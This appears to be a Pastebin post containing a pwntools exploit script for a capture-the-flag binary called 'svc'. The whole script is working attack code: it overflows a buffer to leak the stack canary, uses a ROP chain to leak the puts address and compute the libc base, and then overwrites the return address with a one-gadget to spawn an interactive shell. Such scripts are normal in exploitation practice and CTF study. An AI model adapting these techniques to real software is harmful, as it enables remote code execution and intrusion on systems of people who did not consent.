Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/usr/bin/python3.7
- from pwn import *
- #context.terminal = ['tmux', 'splitw', '-h']
- context.terminal = ['/usr/bin/tilix', '-a', 'session-add-right', '-e' ]
- context.arch = 'amd64'
- context.bits = 64
- chal = './svc'
- libc = '/lib/x86_64-linux-gnu/libc.so.6'
- gdbscript = """br * 0x400ddf
- c
- """
- #p = process(chal)
- #gdb.attach(p, gdbscript)
- p = gdb.debug(chal, gdbscript)
- e = ELF(chal)
- l = ELF(libc)
- def feed(food):
- p.sendlineafter('>>', '1')
- p.sendlineafter('>>', food)
- def review():
- p.sendlineafter('>>', '2')
- p.recvuntil('[*]PLEASE TREAT HIM WELL.....\n-------------------------\n')
- return p.recvuntil('-------------------------\n[*]SCV GOOD TO GO,SIR....\n')
- def mine():
- p.sendlineafter('>>', '3')
- p.recvline()
- #leak canary by overriding null byte and printing
- feed(b'A'*168)
- canary = review().split(b'\n')[1]
- canary = b'\x00' + canary[0:7]
- log.info('leaked canary: ')
- log.info(canary)
- #0x0000000000400ea3: pop rdi; ret;
- poprdi = 0x400ea3
- #rop manuell
- #rop = b''
- #rop += p64(poprdi)
- #rop += p64(e.got['puts'])
- #rop += p64(e.symbols['puts'])
- #rop += p64(0x400a96) # main
- #rop pwntools
- rop = ROP(e)
- rop.puts(e.got['puts'])
- rop.call(0x400a96)
- log.info(rop.dump())
- rop = rop.chain()
- #send libc leak
- feed(b'A'*168 + canary + b'CCCCCCCC' + rop)
- mine()
- putsleak = p.recvline()[:-1]
- log.info('Puts Leak:')
- log.info(putsleak)
- putsleak = u64(putsleak + b'\x00'*(8-len(putsleak)))
- system = putsleak - l.symbols['puts'] + l.symbols['system']
- libcbase = putsleak - l.symbols['puts']
- binsh = putsleak - l.symbols['puts'] + next(l.search(b'/bin/sh\x00'))
- oneg = putsleak - l.symbols['puts'] + 0x10afa9
- log.info('system:')
- log.info(hex(system))
- #exploit rop manuell (not working)
- #rop = b''
- #rop += p64(poprdi)
- #rop += p64(binsh)
- #rop += p64(system)
- l.address = libcbase
- rop = ROP(l)
- rop.system(next(l.search(b'/bin/sh\x00')))
- log.info(rop.dump())
- rop = rop.chain()
- feed(b'A'*168 + canary + b'CCCCCCCC' + p64(oneg))
- #feed(b'A'*168 + canary + b'CCCCCCCC' + rop)
- mine()
- p.interactive()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement